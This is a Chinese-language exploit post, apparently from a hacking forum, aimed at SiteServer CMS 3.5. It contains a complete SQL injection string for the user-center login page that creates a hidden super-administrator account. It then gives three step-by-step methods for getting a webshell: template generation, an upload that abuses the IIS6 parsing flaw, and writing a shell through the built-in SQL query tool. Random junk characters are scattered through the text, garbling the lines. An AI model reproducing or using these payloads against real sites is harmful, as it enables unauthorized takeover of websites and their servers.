经测试秒杀最新的3.5版
6 C3 {4 |% s4 {& K$ A+ wstieserver官网:www.siteserver.cn$ G7 w/ z* m! l" E& \- T, V/ Y
EXP:2 n+ n1 r9 R" v: ?- x t8 o
直接访问UserCenter/login.aspx
: {* c W. e% p0 w2 O( j用户名处输入:2 q- [; _) z: b7 h
5 m0 f& Z' Z4 j! k2 c123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
5 i% W: e, z$ |+ |8 ?% j密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
* g, [0 _. n" c* @之后再访问后台SiteServer/login.aspx用插入的用户登陆
. P B" T3 J5 n后台拿webshell的三种方法:$ P. `2 ~1 N( U3 V# C2 Q
一、7 [) Z% j- X% q
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
: H/ R/ N3 v; p& R9 d二、( c8 F! X) W. ]/ [: N+ `8 E( [
成员权限-》添加用户-》用户名为:1.asp. j6 d* ?4 a5 t% i X- [ Q' _
http://127.0.0.1/usercenter/
8 M3 o! Q o0 Y2 a2 I用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell: K, }* Q# _) y: c2 S9 w7 g( K
(ps:后台添加用户时不会验证是否含有非法字符)1 w1 Q, w1 R$ _8 R" h
三、1 D/ E0 }/ H* d' _0 U& }% b
系统工具-》实用工具-》机器参数查看
0 L! ^ S) V6 \: i1 y3 V4 l" x( o可以看到数据库类型、名称,WEB路径! y! Z# I6 B# A# Z( s3 n
系统工具-》数据库工具-》SQL语句查询: R6 [; H- b+ I1 J0 F7 G
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |